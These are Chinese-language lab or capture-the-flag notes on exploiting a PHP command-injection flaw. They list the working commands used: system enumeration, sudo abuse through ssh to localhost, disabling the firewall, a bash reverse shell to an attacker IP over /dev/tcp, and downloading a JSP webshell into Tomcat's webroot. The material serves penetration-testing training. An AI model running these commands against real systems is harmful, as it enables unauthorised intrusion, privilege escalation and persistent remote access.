当应用需要调用一些外部程序去处理内容的情况下,就会用到一些执行系统命令的函数。如php中的system、exec、shell_exec等,如果用户可以控制命令执行函数中的参数时,将可以注入恶意系统命令到正常的命令中,造成命令执行漏洞。
- 应用调用执行系统命令的函数
- 将用户输入作为系统命令的参数拼接到了命令行中
靶机109攻击机105
高危漏洞
网站根目录
查看临时缓冲目录:ls -alh /tmp/
查看Home目录,挖掘用户信息:ls -alh /home/
查看具体用户的目录:ls -alh /home/用户名
查看系统信息:uname -a
ubuntu系统有防火墙
利用ssh 命令 执行root 用户权限
使用ssh用户名@localhost通过ssh登陆服务器是不需要身份验证的
查看bill用户sudo命令的权限 ssh bill@localhost sudo -l
关闭防火墙:ssh bill@localhost sudo ufw disable
反弹shell
攻击机启动监听netcat
nc -nlvp 4444
靶机反弹shell
ssh bill@localhost sudo bash -i >& /dev/tcp/192.168.1.106/4444 0>&1
ssh bill@localhost sudo bash -i 交互型模式>& /dev/tcp/ tcp协议反弹给攻击机ip/端口4444 0>&1
渗透测试技巧
开启python简易http服务器
python -m SimpleHTTPServer
利用命令执行下载木马文件
ssh bill@localhost sudo wget "http://ip:port/shell.jsp" -O /var/lib/tomcat8/webapps/ROOT/shell.jsp
cd /root/
ls
cat flag